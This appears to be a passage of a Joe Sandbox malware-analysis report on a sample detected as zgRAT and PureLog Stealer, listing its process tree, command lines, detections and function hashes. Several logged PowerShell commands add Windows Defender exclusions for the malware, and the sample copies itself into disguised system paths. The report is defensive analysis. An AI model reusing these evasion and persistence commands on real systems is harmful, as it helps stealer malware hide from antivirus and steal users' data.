Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\0J5DzstGPi.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	04:32:07
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	04:32:08
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\0J5DzstGPi.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\0J5DzstGPi.exe
Imagebase:	0x770000
File size:	1'958'912 bytes
MD5 hash:	FECAFE9A80257E221C47577E704498F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	04:32:08
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\0J5DzstGPi.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\0J5DzstGPi.exe
Imagebase:	0x860000
File size:	1'958'912 bytes
MD5 hash:	FECAFE9A80257E221C47577E704498F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	04:32:08
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LBEMCr2GFO.bat"
Imagebase:	0x7ff7bb5f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	04:32:08
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	04:32:08
Start date:	06/01/2025
Path:	C:\Recovery\sihost.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\sihost.exe
Imagebase:	0x780000
File size:	1'958'912 bytes
MD5 hash:	FECAFE9A80257E221C47577E704498F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\sihost.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	04:32:09
Start date:	06/01/2025
Path:	C:\Recovery\sihost.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\sihost.exe
Imagebase:	0xfd0000
File size:	1'958'912 bytes
MD5 hash:	FECAFE9A80257E221C47577E704498F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	04:32:09
Start date:	06/01/2025
Path:	C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
Imagebase:	0x470000
File size:	1'958'912 bytes
MD5 hash:	FECAFE9A80257E221C47577E704498F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	04:32:09
Start date:	06/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff77b580000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	04:32:09
Start date:	06/01/2025
Path:	C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
Imagebase:	0xf0000
File size:	1'958'912 bytes
MD5 hash:	FECAFE9A80257E221C47577E704498F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	04:32:10
Start date:	06/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6ed930000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	04:32:15
Start date:	06/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	04:32:18
Start date:	06/01/2025
Path:	C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
Imagebase:	0x6e0000
File size:	1'958'912 bytes
MD5 hash:	FECAFE9A80257E221C47577E704498F3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	04:32:20
Start date:	06/01/2025
Path:	C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
Imagebase:	0xac0000
File size:	1'958'912 bytes
MD5 hash:	FECAFE9A80257E221C47577E704498F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 71%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	04:32:22
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat" "
Imagebase:	0x7ff7bb5f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	04:32:22
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	04:32:22
Start date:	06/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff77b580000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	04:32:23
Start date:	06/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff67e1c0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	04:32:26
Start date:	06/01/2025
Path:	C:\Recovery\sihost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\sihost.exe"
Imagebase:	0xae0000
File size:	1'958'912 bytes
MD5 hash:	FECAFE9A80257E221C47577E704498F3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	04:32:28
Start date:	06/01/2025
Path:	C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
Imagebase:	0x7c0000
File size:	1'958'912 bytes
MD5 hash:	FECAFE9A80257E221C47577E704498F3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	04:32:35
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\0J5DzstGPi.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\0J5DzstGPi.exe"
Imagebase:	0xec0000
File size:	1'958'912 bytes
MD5 hash:	FECAFE9A80257E221C47577E704498F3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BCAE701 Relevance: 1.8, APIs: 1, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNELBASE ref: 00007FFD9BCAE8B1

Memory Dump Source

Source File: 00000000.00000002.1865107146.00007FFD9BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bca0000_0J5DzstGPi.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 739b82eb8f6edc76a806c2c7a6901d8954429c2aecabc288b0aaae770b0f6e57
Instruction ID: c8f3049c5266b5883950159b81f99fa921386159245cfc2f2a60bc85e111f12b
Opcode Fuzzy Hash: 739b82eb8f6edc76a806c2c7a6901d8954429c2aecabc288b0aaae770b0f6e57
Instruction Fuzzy Hash: 2471A130618A8D8FDB68DF68C8557F877E1FF58311F14427EE84EC7292CA74A9468B81

Function 00007FFD9B8B0D7C Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd7a741f6bed911456bc24290398951535c4bfd5135e6bc8ee3bf27c27ecd69e
Instruction ID: 49ae85811c7e4f70ddf15fc755f99092cccfc2b481574bd75a55dba4364d3c1a
Opcode Fuzzy Hash: dd7a741f6bed911456bc24290398951535c4bfd5135e6bc8ee3bf27c27ecd69e
Instruction Fuzzy Hash: D471D2B1A19A5D4FDB9CEB6888797A87BE2FF59300F4001BBD049C72E6EF7418058781

Function 00007FFD9B8B090D Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65f88246184db8e53e459f8713b566c22ebeb4199e50bfd35d0f3c58e34cbca2
Instruction ID: 490c4026cc72af93e6afbf5beb7aabc050712e474c0fe9efcdc689597bcfa605
Opcode Fuzzy Hash: 65f88246184db8e53e459f8713b566c22ebeb4199e50bfd35d0f3c58e34cbca2
Instruction Fuzzy Hash: B5415D22B0C9695EE71DB7BC74AA5F87781EF49324B0405BBD00EC71E7ED14A84286C4

Function 00007FFD9B8B0908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 768f4000c236e6a1a9ee49182d320246739de45a474351e58a51e0eca55a1235
Instruction ID: bf0a40023622f54b4dc024b19e4e27e5067bcc51e7bc082b0f97e59701db52d4
Opcode Fuzzy Hash: 768f4000c236e6a1a9ee49182d320246739de45a474351e58a51e0eca55a1235
Instruction Fuzzy Hash: 1821E63130D8194FE7A8EB5CE88ADB977D1EF5932170105BAE58AC7136D911EC828BC1

Function 00007FFD9B8B0C25 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5327b3e02b4b20bc933d555088692e2699008633ba8850a1115806a41ed00698
Instruction ID: 2e660aeee27e6f3e7e3197639547670a2e66693e0e0a5c0775aecf1e1422b751
Opcode Fuzzy Hash: 5327b3e02b4b20bc933d555088692e2699008633ba8850a1115806a41ed00698
Instruction Fuzzy Hash: C4315831B1D26D8EE726ABB998351EC3B60EF46310F0541B7C0488B1E3DA3826468BC1

Function 00007FFD9B8B0998 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 875dd4531ce0a83888f542113e7f3f0d53ceb055edc9f99b533499afd92d44fc
Instruction ID: 73f47e2d847ed4023461654453287db4bc11ffcd970724eb95ec38018735a6c1
Opcode Fuzzy Hash: 875dd4531ce0a83888f542113e7f3f0d53ceb055edc9f99b533499afd92d44fc
Instruction Fuzzy Hash: 00213621B1DD2D0FE758F77C98AA67977C2EB9C315B5500BAE40EC32E7DC24AC428681

Function 00007FFD9B8B11A1 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6216164fa960b67fdc873735a9249fc04c076204bb4347c2adf7ff4bc4e5e460
Instruction ID: 517af7f494565b4a4169b45bfe3986d037536559f577c8d4d843be76a63da9e6
Opcode Fuzzy Hash: 6216164fa960b67fdc873735a9249fc04c076204bb4347c2adf7ff4bc4e5e460
Instruction Fuzzy Hash: B031A830A1965E8FDB49EB74C8659B97BF0FF5A300B0505FBC019DB1B2DA389945CB50

Function 00007FFD9B8B5575 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79205f4a825f0db98d84016335e2ace0eb7f096a24db32cacf0b34921e6ed18d
Instruction ID: 736d87b4b69c9aaf8a17eacc7f2297e505df9898e6926f4e436934db94aa3a89
Opcode Fuzzy Hash: 79205f4a825f0db98d84016335e2ace0eb7f096a24db32cacf0b34921e6ed18d
Instruction Fuzzy Hash: 3021CB70E0891D8FDB65DB14C864BED73A2FB98311F5541A9D00ED72A0CA39AA85CF80

Function 00007FFD9B8B0C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1efb3c929754b7a495d452153efbfcd1e2dfe8f8ad6c3aab28a870a673fa4dcd
Instruction ID: 136dbbdd5c6d82ccb5496deec8342a894cb8fa01ff66d31ef158a0d5383f3338
Opcode Fuzzy Hash: 1efb3c929754b7a495d452153efbfcd1e2dfe8f8ad6c3aab28a870a673fa4dcd
Instruction Fuzzy Hash: 2411E331B1E69D8EE722DBB988611AC7BB0EF46610F1644B7C084DB1A2D63866068BC0

Function 00007FFD9B8B0C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f79c7df014a082685d9537226e7eaf0704b5f980a557ca5d4a6b98dd67b5b4ff
Instruction ID: 47216ed694dcc2977b02178069ab35b5f515cdf2a26445e8dfab1483add63ecf
Opcode Fuzzy Hash: f79c7df014a082685d9537226e7eaf0704b5f980a557ca5d4a6b98dd67b5b4ff
Instruction Fuzzy Hash: 9011E531E1E29D8FE712DBB9886509C7FB0EF06710F1641F7C044DB1A2D63866458BC0

Function 00007FFD9B8B0C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3794b06217a286a7451b5545baff8d60c93b36fdd9e86b0ec037a78a421532a9
Instruction ID: 1e5ff8816ad9aaeeb0b9f52390762bb0141b8be07bcdb980fc2bbe3e25d28d34
Opcode Fuzzy Hash: 3794b06217a286a7451b5545baff8d60c93b36fdd9e86b0ec037a78a421532a9
Instruction Fuzzy Hash: 75019231E1E29D8FE726DBB9886519D7FB0EF06710F1641F7D044DB2A2DA386A45CB80

Function 00007FFD9B8B0C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d26d124d893c769861c293558daad6aebf43b14c4686819a4f79212aa0612e73
Instruction ID: c4fe27d34b07c3d4b8297f817a5f761f89fa17ee02e0b67c04f802fd5e7d01b3
Opcode Fuzzy Hash: d26d124d893c769861c293558daad6aebf43b14c4686819a4f79212aa0612e73
Instruction Fuzzy Hash: B001B130E1E29D8FE722DBB9886409C7FB0EF06700F1541F7C044CB2A2DA386A448B80

Function 00007FFD9B8B0B77 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b13143d68dd57cd8321654f2f92aac1a14f389ee3162d6b1549746889e6aab8c
Instruction ID: fffd8d32339708f856b3d73d5217caa90d59f51b0f38298fa230dc6f382a2d63
Opcode Fuzzy Hash: b13143d68dd57cd8321654f2f92aac1a14f389ee3162d6b1549746889e6aab8c
Instruction Fuzzy Hash: 97E02B7A69A9458FC751DF38ECE14E4BB50FB1220976617EAC089C2162D316455DC741

Function 00007FFD9B8B57D7 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c54d5bb42727af4e90445e336af632048e8a57604da8e15da4a135927066de27
Instruction ID: bff78ed63be46d948bef32a31438f905a04589183da0bdd4165eccb15cfcf893
Opcode Fuzzy Hash: c54d5bb42727af4e90445e336af632048e8a57604da8e15da4a135927066de27
Instruction Fuzzy Hash: 62F0EC72F1943B4BF725972484755BD5156EF48310F5681B5D40DC72EAED5C3F020AC1

Function 00007FFD9B8B0CB9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 345cacf150ecef8ecf0e94776ce9dd44b5dd6eded22d23eb0ea7242628b1913d
Instruction ID: 449b9de6464e9beec115ebbbe103911ec0a1913b23e71e2ed9e56a31bbd3a86b
Opcode Fuzzy Hash: 345cacf150ecef8ecf0e94776ce9dd44b5dd6eded22d23eb0ea7242628b1913d
Instruction Fuzzy Hash: 50F0BE70B1A60ACFF728DBA8C4A47E977A0EF55700F1442B6D008872E5DB7866C8CF80

Function 00007FFD9B8B0845 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d27747d9a712f7ed49b8584e4084b7091693bebadbeabe51e48176f3c95ae620
Instruction ID: f361fc36b2f0b1d0da27c6294d404f4d982cb1fef22a106de023aa1939b56021
Opcode Fuzzy Hash: d27747d9a712f7ed49b8584e4084b7091693bebadbeabe51e48176f3c95ae620
Instruction Fuzzy Hash: 9CD02E386096884ECA00E37CC89209C3F70EB4B22038500E3C448CA173C51988CBC781

Function 00007FFD9B8B45FC Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cd36e6fc6b36c30c0fb5851be205f8466c5a0097b24f31cce2ac1217ff57279
Instruction ID: 5186934b0d1dd7d207d1f049d245360a5b1f52417895d02666ee3c449e20b307
Opcode Fuzzy Hash: 3cd36e6fc6b36c30c0fb5851be205f8466c5a0097b24f31cce2ac1217ff57279
Instruction Fuzzy Hash: EAE0ED20F2952E4AF7A4A7A4C4753BD62529F99300F1241B9D44D973E6DD38AE818E81

Function 00007FFD9B8B06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15b8bec1d0bcfa389f5b2ecb8a0f5e376f974fc9dae17812f5364974a72f694e
Instruction ID: 4976cb63bd1f4512a9d4f3798672ba9012610f55aef580b7dbc1ebb5478f8c54
Opcode Fuzzy Hash: 15b8bec1d0bcfa389f5b2ecb8a0f5e376f974fc9dae17812f5364974a72f694e
Instruction Fuzzy Hash: 16C00205F6B62E01E83577BB98660ACA1409BDEA10FD60176D548400A1984D669909D6

Function 00007FFD9B8B463D Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1860813355.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6227bdf1b355d9670b3c8ee5a5e7b7cca4c2410154708965bc4911a497d0083a
